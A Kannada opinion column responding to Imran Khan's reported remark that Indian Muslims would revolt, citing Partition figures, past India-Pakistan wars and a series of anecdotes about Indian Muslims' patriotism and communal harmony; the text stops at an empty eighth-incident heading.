ಭಾರತದ ಮುಸಲ್ಮಾನರು ದಂಗೆ ಏಳುತ್ತಾರಾ?

ಇತ್ತೀಚೆಗಷ್ಟೇ ಪಾಕಿಸ್ತಾನದ ಪ್ರಧಾನಿ ಇಮ್ರಾನ್ ಖಾನ್ ಅವರು ಕಾಶ್ಮೀರ ವಿಷಯದಲ್ಲಿ ಭಾರತಕ್ಕೆ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ಬೆಂಬಲ ಹೆಚ್ಚಾದಲ್ಲಿ ಭಾರತದ ಮುಸ್ಲೀಮರು ದಂಗೆ ಏಳುತ್ತಾರೆ ಎಂಬ ಹೇಳಿಕೆಯೊಂದನ್ನು ನೀಡಿದ್ದಾರೆ. ಅವರ ಈ ಮಾತುಗಳ ಹಿಂದಿನ ಭ್ರಮೆ ಮತ್ತು ದುಷ್ಟತನ ಬಿಚ್ಚಿಡುವ ವಾಸ್ತವ ಘಟನೆಗಳು ಹೀಗಿವೆ.

1992 ಮಾರ್ಚ್ ತಿಂಗಳ ಇಪ್ಪತ್ತೈದನೇ ತಾರೀಖು ಪಾಕಿಸ್ತಾನ ಸೀಮಿತ ಓವರುಗಳ ಕ್ರಿಕೆಟ್ ಪಂದ್ಯಾಟದಲ್ಲಿ ವಿಶ್ವಕಪ್ ಫೈನಲ್ ಜಯಿಸಿದಾಗ ಇದೇ ಇಮ್ರಾನ್ ಖಾನ್ ಪಾಕ್ ತಂಡದ ನಾಯಕರಾಗಿದ್ದರು. ಅಂದು ಕಪ್ ಜಯಿಸಿದ ಖುಷಿಯಲ್ಲಿ ಮಾಧ್ಯಮಗಳಿಗೆ ಹೇಳಿಕೆ ನೀಡುವ ಸಂದರ್ಭದಲ್ಲಿ ಇದು ಕೇವಲ ಪಾಕಿಸ್ತಾನದ ವಿಜಯವಲ್ಲ, ಬದಲಿಗೆ ಭಾರತ ಉಪಖಂಡದ ವಿಜಯ ಎಂದೇ ನುಡಿದಿದ್ದರು. ಅವರ ಈ ಹೇಳಿಕೆಗೆ ಸಂಪ್ರದಾಯವಾದಿ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಭಾರೀ ವಿರೋಧ ವ್ಯಕ್ತವಾಗಿತ್ತು. ಆಗ ಇನ್ನೂ ವಿದ್ಯಾರ್ಥಿಗಳಾಗಿದ್ದ ನಮ್ಮಲ್ಲಿ ಈ ಹೇಳಿಕೆ ಹೊಸ ಸಂಚಲನೆಯನ್ನು ಉಂಟು ಮಾಡಿ ಇಂತಹ ವ್ಯಕ್ತಿ ಪಾಕಿಸ್ತಾನದ ಪ್ರಧಾನಿಯಾದಲ್ಲಿ ಇಂಡೋ ಪಾಕ್ ಸಂಬಂಧಕ್ಕೆ ಹೊಸ ಆಯಾಮ ದೊರಕಬಲ್ಲದು ಎಂಬ ಆಶಾಭಾವನೆ ಮೂಡಿತ್ತು…

ಇಂದು ಎಲ್ಲವೂ ಬದಲಾಗಿದೆ, ಆ ಘಟನೆ ನಡೆದು 27 ವರ್ಷಗಳು ಕಳೆದಿವೆ. ಅದೇ ಇಮ್ರಾನ್ ಖಾನ್ ಇಂದು ತಮ್ಮ ರಾಷ್ಟ್ರದ ಪ್ರಧಾನಿಯೂ ಆಗಿದ್ದಾರೆ. ಅಂದಿನ ಅವರ ಮಾತುಗಳು ನಮ್ಮ ಸ್ಮೃತಿಪಟಲದಲ್ಲಿ ಅನುರಣಿಸುತ್ತಿವೆ, ಆದರೆ ಅವರ ನೆನಪಿನಿಂದ ದೂರವಾಗಿವೆ.

ಅಂದು ಪಾಕ್ ಕ್ರಿಕೆಟ್ ತಂಡದ ನಾಯಕರಾಗಿದ್ದವರು, ಇಂದು ಪಾಕ್ ರಾಜಕೀಯ ರಥದ ಸಾರಥಿಯಾಗಿದ್ದಾರೆ, ಅಧಿಕಾರದ ಚುಕ್ಕಾಣಿ ಅವರ ಕೈಯಲ್ಲಿದೆ. ಇಪ್ಪತ್ತೇಳು ವರ್ಷಗಳ ಹಿಂದಿನ ಮನಸ್ಥಿತಿ ಮಾತ್ರ ಮರೆಯಾಗಿದೆ. ಅಂದು ಯಾವುದೇ ವಿಷಯದ ಬಗ್ಗೆ ಹೃದಯದಿಂದ ಆಲೋಚಿಸುತ್ತಿದ್ದವರು ಇಂದು ಮಿದುಳಿನಿಂದ ಆಲೋಚಿಸಲು ಆರಂಭಿಸಿದ್ದಾರೆ. ಸಂಪೂರ್ಣವಾಗಿ -ಪಕ್ಕಾ ರಾಜಕಾರಣಿಯಾಗಿ ಬದಲಾಗಿದ್ದಾರೆ. ಹಾಗಾಗಿಯೇ ಅವರು ನೀಡುತ್ತಿರುವ ಎಲ್ಲ ಹೇಳಿಕೆಗಳು ಸಹ ಅಪ್ರಬುದ್ಧ, ಹಾಸ್ಯಾಸ್ಪದ ಹಾಗೂ ಅಸಂಗತವಾಗಿಯೇ ಕಂಡು ಬರುತ್ತಿವೆ. ಈ ಬೆಳವಣಿಗೆಗೆ ಹೊಸ ಸೇರ್ಪಡೆ ಅವರು ಭಾರತೀಯ ಮುಸ್ಲಿಮರ ಕುರಿತಾಗಿ ನೀಡಿರುವ ಇತ್ತೀಚಿನ ಹೇಳಿಕೆ.

ಹೇಳಿಕೆ ನೀಡಿರುವ ವ್ಯಕ್ತಿ ಬೇರೊಬ್ಬರಾದರೂ ಈ ಭಾವನೆಗೆ ಸರಿಸುಮಾರು ಎಪ್ಪತ್ತೆರಡು ವರ್ಷಗಳ ಇತಿಹಾಸವೇ ಇದೆ. 1947ರಲ್ಲಿ ಸ್ವಾತಂತ್ರ್ಯವನ್ನು ಪಡೆದಂದಿನಿಂದ ಇಂದಿನವರೆಗಿನ ಏಳು ದಶಕಗಳ ಸಂದರ್ಭದಲ್ಲಿ ನಾಲ್ಕು ಬಾರಿ ಪಾಕಿಸ್ತಾನ-ಭಾರತದ ನಡುವೆ ಘೋಷಿತ ಯುದ್ಧಗಳೇ ನಡೆದಿವೆ. ಪ್ರತಿ ಯುದ್ಧಕ್ಕೂ ಸಹ ಪಾಕಿಸ್ತಾನವೇ ಕಾರಣವೆಂಬುದು ಪ್ರತ್ಯೇಕವಾಗಿ ಹೇಳಬೇಕಾಗಿಲ್ಲದ ವಿಷಯವಾಗಿದೆ. 1947-1948ರಲ್ಲಿ ಜಮ್ಮು ಮತ್ತು ಕಾಶ್ಮೀರದ ಆಕ್ರಮಣಕ್ಕಾಗಿ ನಡೆದ ಪ್ರಯತ್ನ ಮೊದಲನೆಯದಾದರೆ, 1965ರಲ್ಲಿ ಶಾಸ್ತ್ರೀಜಿಯವರು ಭಾರತದ ಪ್ರಧಾನಿಯಾಗಿದ್ದಾಗ ನಡೆದ ಆಕ್ರಮಣ ಎರಡನೆಯದು. ಇದಾದ ನಂತರ 1971ರಲ್ಲಿ ಬಾಂಗ್ಲಾ ವಿಮೋಚನಾ ಯುದ್ಧವಾಗಿ ನಡೆದದ್ದು ಮೂರನೆಯದಾದರೆ, 1999ರಲ್ಲಿ ಕಾರ್ಗಿಲ್ ನಲ್ಲಿ ನಡೆದ ಯುದ್ಧ ನಾಲ್ಕನೆಯದು. ಈ ನಾಲ್ಕೂ ಸಂದರ್ಭಗಳಲ್ಲಿ ಪಾಕಿಸ್ತಾನದ ಆಕ್ರಮಣಕ್ಕೆ ಪ್ರೇರಣೆ ನೀಡಿದ ಆಲೋಚನೆ ಎಂದರೆ ತಮ್ಮ ದಾಳಿಯ ಸಂದರ್ಭದಲ್ಲಿ ಭಾರತದಲ್ಲಿ ಆಂತರಿಕವಾಗಿ ಬೆಂಬಲ ದೊರಕುತ್ತದೆ ಎಂಬ ಭಾವನೆ ಹಾಗೂ ನಿರೀಕ್ಷೆ!

ಭಾರತ ಉಪಖಂಡ ಇಬ್ಭಾಗಗೊಂಡು ಭಾರತ ಹಾಗೂ ಪಾಕಿಸ್ತಾನ ಎಂಬ ಎರಡು ರಾಷ್ಟ್ರಗಳು ಅಸ್ತಿತ್ವಕ್ಕೆ ಬಂದ ಸಂದರ್ಭದಲ್ಲಿಯೇ ಜನಸಮುದಾಯಕ್ಕೆ ಆಯ್ಕೆಯ ಸ್ವಾತಂತ್ರ್ಯವನ್ನು ನೀಡಲಾಗಿತ್ತು. ವಿಭಜನೆಯ ಪೂರ್ವದ ಭಾರತದಲ್ಲಿ ಇದ್ದ ಒಟ್ಟು 390 ಮಿಲಿಯನ್ ಜನಸಂಖ್ಯೆಯಲ್ಲಿ 330 ಮಿಲಿಯನ್ ಭಾರತದಲ್ಲಿ ಉಳಿದರೆ 30 ಮಿಲಿಯನ್ ಪಶ್ಚಿಮ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಹಾಗೂ 30 ಮಿಲಿಯನ್ ಪೂರ್ವ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಉಳಿಯಲು ನಿರ್ಧರಿಸಿದರು. ಸರಿಸುಮಾರು 14.5 ಮಿಲಿಯನ್ ಜನ ಉಭಯ ದೇಶಗಳ ಗಡಿಯನ್ನು ದಾಟಿದರು.

ಭಾರತದಿಂದ ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಸುಮಾರು 72,26,600 ಜನ ಗಡಿ ದಾಟಿ ಹೋದರೆ, ಪಾಕಿಸ್ತಾನದಿಂದ ಭಾರತಕ್ಕೆ ಸುಮಾರು 72,95,870 ಜನ ಗಡಿ ದಾಟಿ ಬಂದರು. ಈಗಿನ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಅಂದರೆ ಸ್ವಾತಂತ್ರ್ಯ ಬಂದ ಸಂದರ್ಭದ ಪಶ್ಚಿಮ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ನೆಲೆಸಿದ ಜನಸಂಖ್ಯೆಯಲ್ಲಿ ಶೇ.96.5ರಷ್ಟು ಮುಸ್ಲಿಮರಾದರೆ ಶೇ.3.5ರಷ್ಟು ಹಿಂದೂ, ಕ್ರಿಶ್ಚಿಯನ್ ಹಾಗೂ ಸಿಖ್ ಧರ್ಮೀಯರಾಗಿದ್ದರು. ಭಾರತದಲ್ಲಿ ನೆಲೆಸಿದ ಜನಸಂಖ್ಯೆಯಲ್ಲಿ ಶೇ.84.5ರಷ್ಟು ಹಿಂದೂ ಧರ್ಮೀಯರಾದರೆ ಶೇ.15.5ರಷ್ಟು ಮುಸ್ಲಿಂ, ಕ್ರಿಶ್ಚಿಯನ್, ಸಿಖ್ ಹಾಗೂ ಇತರೆ ಧರ್ಮೀಯರಾಗಿದ್ದರು.

ಈ ಅಂಶಗಳನ್ನು ಹಿನ್ನೆಲೆಯಾಗಿರಿಸಿಕೊಂಡು ಈ ಹಂತದಲ್ಲಿ ಸ್ವಾತಂತ್ರ್ಯಾನಂತರದ ನಂತರದ ಭಾರತದ ಒಂದಷ್ಟು ಘಟನೆಗಳ ಹಾಗೂ ವಾಸ್ತವ ಸಂಗತಿಗಳ ಪುನರಾವಲೋಕನ ಮಾಡಬೇಕಿರುವ ಪ್ರಕ್ರಿಯೆ ಹಿಂದೆಂದಿಗಿಂತಲೂ ಇಂದು ಅನಿವಾರ್ಯವೆಂದು ತೋರುತ್ತದೆ.

ಘಟನೆ 1

1947ರಲ್ಲಿ ದೇಶಕ್ಕೆ ಸ್ವಾತಂತ್ರ್ಯ ಬರುವ ಸಂದರ್ಭ. ಆಗ ಭಾರತದ ಪ್ರಖ್ಯಾತ ಶಹನಾಯಿ ವಾದಕರಾಗಿದ್ದ ಉಸ್ತಾದ್ ಬಿಸ್ಮಿಲ್ಲಾ ಖಾನ್ ಅವರನ್ನು ಮುಸ್ಲಿಮರಿಗಾಗಿಯೇ ಪ್ರತ್ಯೇಕವಾಗಿ ರಚಿಸಲಾಗುತ್ತಿರುವ ರಾಷ್ಟ್ರ -ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಬರುವಂತೆ ಆಹ್ವಾನಿಸಲಾಯಿತು. ಅವರ ಅದ್ಭುತ ವಿದ್ವತ್ತಿಗೆ ಅಂತರರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ದೊರೆಯಬೇಕಾದ ಎಲ್ಲ ಅವಕಾಶಗಳನ್ನು, ಗೌರವಗಳನ್ನು ದೊರಕಿಸಿಕೊಡುವುದಾಗಿ ಮನವರಿಕೆ ಮಾಡಿಕೊಡಲಾಯಿತು. ಈ ಆಹ್ವಾನಕ್ಕೆ ನಗುತ್ತಲೇ ಉತ್ತರಿಸಿದ ಬಿಸ್ಮಿಲ್ಲಾ ಖಾನ್ ತಾವು ಖಂಡಿತವಾಗಿಯೂ ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಬರಲು ಸಿದ್ಧ, ಆದರೆ ತನ್ನ ಇದುವರೆಗಿನ ಸಾಧನೆಗೆ ಪ್ರೇರಕ ಶಕ್ತಿಯಾಗಿರುವ ಗಂಗಾನದಿ ಹಾಗೂ ಕಾಶಿ ವಿಶ್ವನಾಥನ ದೇವಾಲಯಗಳೂ ನನ್ನೊಂದಿಗೆ ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಬರಬೇಕು ಎಂದು ಹೇಳಿದರು!

ಘಟನೆ 2

ರಾಷ್ಟ್ರ ಇಬ್ಭಾಗವಾದ ಆ ಸಂದರ್ಭದಲ್ಲಿಯೇ ಭಾರತದಲ್ಲಿ ನೆಲೆಸಿದ್ದ ಪಾರ್ಸಿ ಜನಾಂಗದ, ಅಜೀಂ ಪ್ರೇಮ್‍ಜಿ ಅವರ ಪೂರ್ವಜರನ್ನು ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಬರುವಂತೆ ಕೇಳಿಕೊಳ್ಳಲಾಗಿತ್ತು. ಸ್ವತಂತ್ರ ಪಾಕಿಸ್ತಾನದ ಮೊಟ್ಟಮೊದಲ ವಿತ್ತಮಂತ್ರಿಯ ಹುದ್ದೆಯನ್ನು ಅವರಿಗಾಗಿಯೇ ಮೀಸಲಿಡುವ ಆಮಿಷವನ್ನು ಸಹ ಅವರಿಗೆ ಒಡ್ಡಲಾಯಿತು. ಆದರೆ ಈ ಆಹ್ವಾನವನ್ನು ನಯವಾಗಿಯೇ ತಿರಸ್ಕರಿಸಿದ ಅವರು ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಒಬ್ಬ ಮಂತ್ರಿಯಾಗುವ ಬದಲು ಭಾರತದಲ್ಲಿ ಸಾಮಾನ್ಯ ನಾಗರಿಕನಾಗಿ ಉಳಿಯಲು ಇಚ್ಛಿಸುತ್ತೇನೆ ಎಂದು ಉತ್ತರಿಸಿದರು!

ಘಟನೆ 3

1990ರ ದಶಕ. ಬಿ.ಆರ್.ಛೋಪ್ರಾ ಅವರ ಸಾಪ್ತಾಹಿಕ ಟಿ.ವಿ. ಧಾರಾವಾಹಿ ‘ಮಹಾಭಾರತ’ ಹಿಂದಿ ಭಾಷೆಯಲ್ಲಿ ನಿರ್ಮಾಣವಾಗುತ್ತಿದ್ದ ಸಂದರ್ಭ. ಇದಕ್ಕೆ ಚಿತ್ರಕಥೆ ಸಂಭಾಷಣೆ ಹಾಡುಗಳನ್ನು ಬರೆಯುವ ಜವಾಬ್ದಾರಿಯನ್ನು ರಾಹಿ ಮಾಸೂಮ್ ರೇಜಾ ಅವರಿಗೆ ವಹಿಸಿಕೊಡಲಾಗಿತ್ತು. ಮಹಾಭಾರತದಂತಹ ಹಿಂದೂ ಧರ್ಮಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಟೆಲಿ ಸರಣಿಗೆ ಸಂಭಾಷಣೆ, ಹಾಡುಗಳನ್ನು ಬರೆಯುವಂತಹ ಗುರುತರ ಜವಾಬ್ದಾರಿಯನ್ನು ಮುಸ್ಲಿಮರೊಬ್ಬರಿಗೆ ನೀಡಿದ್ದು ಸಾಕಷ್ಟು ಜನರ ಹುಬ್ಬೇರುವಂತೆ ಮಾಡಿತ್ತು. ಆ ವ್ಯಕ್ತಿಯಿಂದ ಈ ಜವಾಬ್ದಾರಿಗೆ ಎಷ್ಟರ ಮಟ್ಟಿಗೆ ನ್ಯಾಯ ದೊರಕಲು ಸಾಧ್ಯ ಎಂಬ ಆತಂಕವೂ ನೆಲೆಗೊಂಡಿತ್ತು.

ಧಾರಾವಾಹಿ ಪ್ರಾರಂಭಗೊಂಡ ಎಂಟರಿಂದ ಹತ್ತು ಕಂತುಗಳಲ್ಲಿಯೇ ಜನಸಾಮಾನ್ಯರಲ್ಲಿ ಆತಂಕ ದೂರವಾಗಿದ್ದು ಮಾತ್ರವಲ್ಲ, ವಾರದಿಂದ ವಾರಕ್ಕೆ ಧಾರಾವಾಹಿಯ ಎಲ್ಲ ಪಾತ್ರಗಳನ್ನು ಮೀರಿದ ಜನಪ್ರಿಯತೆ ರೇಜಾ ಅವರ ಸಂಭಾಷಣೆ ಹಾಗೂ ಹಾಡುಗಳಿಗೆ ದೊರೆಯಿತು. ಅಥ ಶ್ರೀ ಮಹಾಭಾರತ್ ಕಥಾ, ಕಥಾ ಹೆ ಪುರುಷಾರ್ಥಕೀ, ಸ್ವಾರ್ಥಕೀ ಪರಮಾರ್ಥಕೀ, ಸಾರಥಿ ಜಿಸ್ ಕೆ ಬನೆ ಶ್ರೀ ಕೃಷ್ಣ ಭಾರತ ಪಾರ್ಥಕಿ, ಶಬ್ದ ದಿಗ್ಘೋಷ ಹುವಾ -ಜಬ್ ಸತ್ಯ ಸಾರ್ಥಕ ಸರ್ವದಾ, ಯದಾ ಯದಾ ಹಿ ಧರ್ಮಸ್ಯ ಗ್ಲಾನಿರ್ಭವತಿ ಭಾರತ… ಸಂಭವಾಮಿ ಯುಗೇ ಯುಗೇ… ಎಂಬ ಪ್ರಾರಂಭದ ಹಾಡು ಹಾಗೂ ಭಾರತ್ ಕೀ ಕಹಾನಿ – ನದಿಯೋಂ ಸೆ ಭೀ ಪುರಾನೀ – ಹೇ ಜ್ಞಾನ ಕೀ ಯೆ ಗಂಗಾ – ರಿಷಿಯೋಂಕಿ ಅಮರಭಾನೀ – ಯೇ ವಿಶ್ವಭಾರತೀ ಹೇ – ವೀರೋಂಕಿ ಆರತೀ ಹೇ – ಯೇ ನಿತ್ ನಯಿ ಪುರಾನೀ – ಭಾರತ್ ಕೀ ಕಹಾನಿ… ಮಹಾಭಾರತ್… ಮಹಾಭಾರತ್… ಮಹಾಭಾರತ್ ಎಂಬ ಮುಕ್ತಾಯದ ಹಾಡುಗಳು ಪ್ರೇಕ್ಷಕರನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಮರುಳು ಮಾಡಿದವು.

ಕೃಷ್ಣ, ಭೀಷ್ಮ, ಕರ್ಣ, ಅರ್ಜುನ, ದುರ್ಯೋಧನ, ದ್ರೌಪದಿ, ಅಭಿಮನ್ಯು ಮಾತ್ರವಲ್ಲದೆ ವಿಧುರ, ಧೃತರಾಷ್ಟ್ರ, ಗಾಂಧಾರಿ ಮುಂತಾದ ಬಹುತೇಕ ಎಲ್ಲ ಪಾತ್ರಗಳಿಗೆ ಸಮಾನ ಪ್ರಾಶಸ್ತ್ಯ-ಮೌಲ್ಯ ಹಾಗೂ ತೂಕ ದೊರೆತು, ಸುಮಾರು 105 ಕಂತುಗಳಲ್ಲಿ ಪ್ರಸಾರವಾದ ಈ ಧಾರಾವಾಹಿ ಮಹಾಭಾರತದ ಹೊಸ ದರ್ಶನವನ್ನೇ ಭಾರತೀಯರಿಗೆ ಮಾಡಿಸಿತು. ನೂರಕ್ಕೆ ನೂರರಷ್ಟು ಪ್ರೇಕ್ಷಕರನ್ನು ಹೊಂದಿದ್ದ ಈ ಧಾರಾವಾಹಿ ಭಾರತ ಟೆಲಿವಿಷನ್ ಇತಿಹಾಸದಲ್ಲಿ ಹೊಸ ವ್ಯಾಖ್ಯಾನವನ್ನೇ ಬರೆಯಿತು. ಇದರ ಬಹುಪಾಲು ಶ್ರೇಯಸ್ಸು -ಪ್ರಾತಃ ಸ್ಮರಣೀಯ ಶ್ರೇಯಸ್ಸು ಸಲ್ಲಬೇಕಾದದ್ದು ರೇಜಾ ಅವರಿಗೆ ಎಂಬುದು ನಿರ್ವಿವಾದ ಮಾತು.

ಘಟನೆ 4

1999 ಡಿಸೆಂಬರ್ 31ರಂದು ಇಪ್ಪತ್ತನೆಯ ಶತಮಾನ ಅಂತ್ಯಗೊಂಡು ಇಪ್ಪತ್ತೊಂದನೆಯ ಶತಮಾನ ಪ್ರಾರಂಭವಾಗುತ್ತಿದ್ದ ಅಪರೂಪದ ಸಂದರ್ಭದಲ್ಲಿ ರಾಮನಗರ ಜಿಲ್ಲೆ, ಕನಕಪುರ ತಾಲೂಕು, ಹಾರೋಹಳ್ಳಿಯಲ್ಲಿ ಈ ಸಂಭ್ರಮದ ಆಚರಣೆಯ ಕಾರ್ಯಕ್ರಮ ನಡೆದದ್ದು ಅಲ್ಲಿನ ಮಸೀದಿಯ ಪ್ರಾಂಗಣದಲ್ಲಿ! ಅದೂ ಧರ್ಮ ಸಮನ್ವಯಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ವಿಶೇಷ ಹಾಗೂ ಅರ್ಥಪೂರ್ಣ ಕಾರ್ಯಕ್ರಮವೊಂದರ ಮೂಲಕ! ಹಿಂದೂ, ಇಸ್ಲಾಂ ಹಾಗೂ ಕ್ರಿಶ್ಚಿಯನ್ ಧರ್ಮಗಳ ಸಾರದ ಪರಿಚಯಾತ್ಮಕ ಕಾರ್ಯಕ್ರಮ ಇದಾಗಿತ್ತು.

ಸುಮಾರು 400ರಷ್ಟು ಸಹೃದಯ ನಾಗರಿಕರು ಗ್ರಾಮಾಂತರ ಪ್ರದೇಶದ ಈ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಪಾಲ್ಗೊಂಡಿದ್ದು ವಿಶೇಷವಾಗಿತ್ತು! ಇದೇ ಗ್ರಾಮದಲ್ಲಿ ಪ್ರತಿ ಆಗಸ್ಟ್ 15 ರಂದು ಮಧ್ಯರಾತ್ರಿಯ ಧ್ವಜಾರೋಹಣ ಕಾರ್ಯಕ್ರಮ ಸುಮಾರು ಹದಿನೆಂಟು ವರ್ಷಗಳಿಂದ ನಿರಂತರವಾಗಿ, ಸಂಭ್ರಮ-ಉತ್ಸಾಹಗಳಿಂದ ನೆರವೇರುತ್ತಿದೆ. ಇದರ ನೇತೃತ್ವವನ್ನು ವಹಿಸಿರುವವರು ಮಹಮ್ಮದ್ ಯಾಕೂಬ್ ಪಾಷಾ ಎಂಬ ಶಿಕ್ಷಕರು ಹಾಗೂ ಅವರ ಸ್ನೇಹಿತರು! ಇದೇ ಗ್ರಾಮದ ಸಾಂಸ್ಕೃತಿಕ ಶ್ರೀಮಂತಿಕೆ ಹಾಗೂ ಸೌಹಾರ್ದಕ್ಕೆ ಇನ್ನೊಂದು ನಿದರ್ಶನವೆಂದರೆ ಇಮ್ತಿಯಾಜುದ್ದೀನ್ ಎಂಬ ಗಾಯಕರು. ಕುವೆಂಪು-ಬೇಂದ್ರೆ ಮುಂತಾದವರ ಭಾವಗೀತೆಗಳ ಗಾಯನದ ಜೊತೆಗೆ, ಪುರಂದರದಾಸರ ಭಕ್ತಿಗೀತೆಗಳನ್ನು ಸುಶ್ರಾವ್ಯವಾಗಿ ಹಾಡುವ ಕಲೆಗಾರಿಕೆಯನ್ನು ಸಿದ್ಧಿಸಿಕೊಂಡಿದ್ದಾರೆ! ಕೇಶಿರಾಜನ ಶಬ್ದಮಣಿ ದರ್ಪಣ ಗ್ರಂಥವನ್ನು ಕರತಲಾಮಲಕ ಮಾಡಿಕೊಂಡು ಆ ಗ್ರಂಥಕ್ಕೆ ಸರಳ ವ್ಯಾಖ್ಯಾನವನ್ನು ತಮ್ಮ ‘ದರ್ಪಣ ದೀಪಿಕೆ’ ಗ್ರಂಥದ ಮೂಲಕ ನೀಡಿದ ಪ್ರೊಫೆಸರ್ ಅಬ್ದುಲ್ ಬಶೀರ್ ಇದೇ ಗ್ರಾಮದ ಶಾಲೆಯ ಮೂಲದವರು ಎಂಬುದು ಉಲ್ಲೇಖನೀಯ.

ಘಟನೆ 5

ಈಗ್ಗೆ ಸುಮಾರು ಒಂದೂವರೆ ದಶಕದಷ್ಟು ಹಿಂದೆಯೇ, ಭಾರತದಲ್ಲಿನ ಕಲೆ ಹಾಗೂ ಸಂಗೀತ ಕ್ಷೇತ್ರದಲ್ಲಿ ಇಸ್ಲಾಂ ಧರ್ಮೀಯರಿಗೆ ಮುಕ್ತ ಅವಕಾಶಗಳಿಲ್ಲ, ಅವರನ್ನು ದ್ವಿತೀಯ ದರ್ಜೆ ನಾಗರಿಕರಂತೆ ನಡೆಸಿಕೊಳ್ಳಲಾಗುತ್ತಿದೆ ಎಂಬ ಮಾತುಗಳು ಪಾಕಿಸ್ತಾನದ ಕಡೆಯಿಂದ ಬಂದಿದ್ದ ಸಂದರ್ಭದಲ್ಲಿ, ಉಸ್ತಾದ್ ಅಮ್ಜದ್ ಅಲಿ ಖಾನ್, ಉಸ್ತಾದ್ ಜಾಕೀರ್ ಹುಸೇನ್, ಸಾಹಿತಿ ಜಾವೇದ್ ಅಕ್ತರ್ ಹಾಗೂ ಬಾಲಿವುಡ್ ನ ಹಿರಿಯ ನಾಯಕ ನಟರೇ ಇದರ ವಿರುದ್ಧವಾಗಿ ತೀಕ್ಷ್ಣವಾಗಿ ಪ್ರತಿಕ್ರಿಯಿಸಿದ್ದು ಸ್ವತಃ ಪಾಕಿಸ್ತಾನಕ್ಕೇ ಆಘಾತಕಾರಿ ವಿಷಯವಾಗಿತ್ತು.

ಘಟನೆ 6

ಐದು ವರ್ಷಗಳ ಹಿಂದಿನ ಮಾತು. ಇನ್ನೂ ಎರಡು ವರ್ಷವೂ ತುಂಬದೆ ಇದ್ದ ಮಗುವೊಂದಕ್ಕೆ ಹೃದಯದ ಶಸ್ತ್ರಚಿಕಿತ್ಸೆ ಅನಿವಾರ್ಯವಾಗಿದ್ದು ಆ ಚಿಕಿತ್ಸೆ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಲಭ್ಯವಿಲ್ಲದಿದ್ದಾಗ ಆ ಮಗುವಿನ ಪೋಷಕರು ಬೆಂಗಳೂರಿಗೆ ಆಗಮಿಸುತ್ತಾರೆ. ಸುಮಾರು ಎರಡೂವರೆ ತಿಂಗಳು, ಮಗುವಿನ ಶಸ್ತ್ರಚಿಕಿತ್ಸೆ ಹಾಗೂ ಆ ನಂತರದ ಉಪಚಾರಕ್ಕಾಗಿ ಕಳೆಯುತ್ತದೆ. ಚಿಕಿತ್ಸೆ ಮುಗಿಸಿಕೊಂಡು ವಾಪಸಾಗುವಾಗ ಮಗುವಿನ ಪೋಷಕರು ಹೇಳಿದ ಮಾತು: ‘ಶಸ್ತ್ರಚಿಕಿತ್ಸೆಯ ಅನಿವಾರ್ಯತೆಗಾಗಿ ಭಾರತದಂತಹ ನಮ್ಮದಲ್ಲದ ರಾಷ್ಟ್ರಕ್ಕೆ ಬರುವಾಗ ಸಾಕಷ್ಟು ಆತಂಕದಿಂದಲೇ ಬಂದೆವು. ಆದರೆ ಇಲ್ಲಿಯ ಚಿಕಿತ್ಸೆ ಹಾಗೂ ಅದಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ನಮ್ಮನ್ನು ನಡೆಸಿಕೊಂಡ ರೀತಿಯಿಂದ ಆನಂದ ಹಾಗೂ ಸಂಕೋಚ ಎರಡೂ ಆಗಿದೆ. ಇದುವರೆಗೆ ನಮ್ಮ ದೇಶದಲ್ಲಿ ಈ ನೆಲದ ಬಗೆಗೆ ಇದ್ದ ಭಾವನೆಗೆ ವ್ಯತಿರಿಕ್ತ ಅನುಭವ ನಮಗಾಗಿದೆ. ನಾವು ಈ ಸಂದೇಶದೊಂದಿಗೆ -ಅತ್ಯಂತ ಭಾರವಾದ ಮನಸ್ಸಿನಿಂದ ನಮ್ಮ ದೇಶಕ್ಕೆ ವಾಪಸಾಗುತ್ತಿದ್ದೇವೆ’.

ಘಟನೆ 7

ಮುಂಬಯಿಯ ತಾಜ್ ಹೋಟೆಲ್ ಭಯೋತ್ಪಾದಕ ದಾಳಿಯ ಸಂದರ್ಭದಲ್ಲಿ ಪ್ರಮುಖ ಆರೋಪಿಯಾಗಿ ಜೀವಂತವಾಗಿ ಸೆರೆ ಸಿಕ್ಕಿದ್ದ ಅಜ್ಮಲ್ ಕಸಬ್‍ನನ್ನು ಸುಮಾರು ಎರಡು ವರ್ಷದ ಸುದೀರ್ಘ ವಿಚಾರಣೆಯ ನಂತರ ಅಂತಿಮವಾಗಿ ಗಲ್ಲಿಗೇರಿಸಲಾಯಿತು. ಆತನ ಪಾರ್ಥಿವ ಶರೀರಕ್ಕೆ ಆಗಬೇಕಿದ್ದ ಸಂಸ್ಕಾರದ ಉದ್ದೇಶಕ್ಕಾದರೂ ನೆರೆಯ ರಾಷ್ಟ್ರ ಪಾಕಿಸ್ತಾನ ಆತನನ್ನು ತನ್ನ ರಾಷ್ಟ್ರೀಯ ಎಂದು ಒಪ್ಪಿಕೊಳ್ಳದಿದ್ದಾಗ ಅನಾಥವಾಗಿಯೇ ಉಳಿದ ಕಸಬ್‍ನ ದೇಹವನ್ನು ಭಾರತೀಯರೇ ಸಂಸ್ಕಾರ ಮಾಡಿ ತಮ್ಮ ಮಾನವೀಯತೆಯನ್ನು ಮೆರೆದ ಪ್ರಕರಣವನ್ನು ಯಾರೂ, ಕಸಬ್‍ನ ಪೋಷಕರಂತೂ ಮರೆಯಲು ಸಾಧ್ಯವಿಲ್ಲ!

ಘಟನೆ 8

